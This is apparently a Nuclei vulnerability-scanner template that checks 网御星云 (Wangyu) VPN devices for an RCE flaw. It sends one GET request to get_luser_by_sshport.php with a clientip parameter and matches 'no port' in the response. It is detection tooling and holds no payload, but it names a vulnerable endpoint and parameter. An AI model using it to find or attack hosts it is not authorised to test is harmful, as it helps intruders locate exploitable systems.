id: wangyu_vpn_rce

info:
  name: 网御星云rce
  author: str1am
  severity: high
  tags: wangyu,rce

requests:
  - raw:
      - |
        GET /get_luser_by_sshport.php?clientip=1 HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=3fb96c88dba8423df5dbeea42497ea34
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Te: trailers
        Connection: close


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "no port"
        part: body
        condition: and
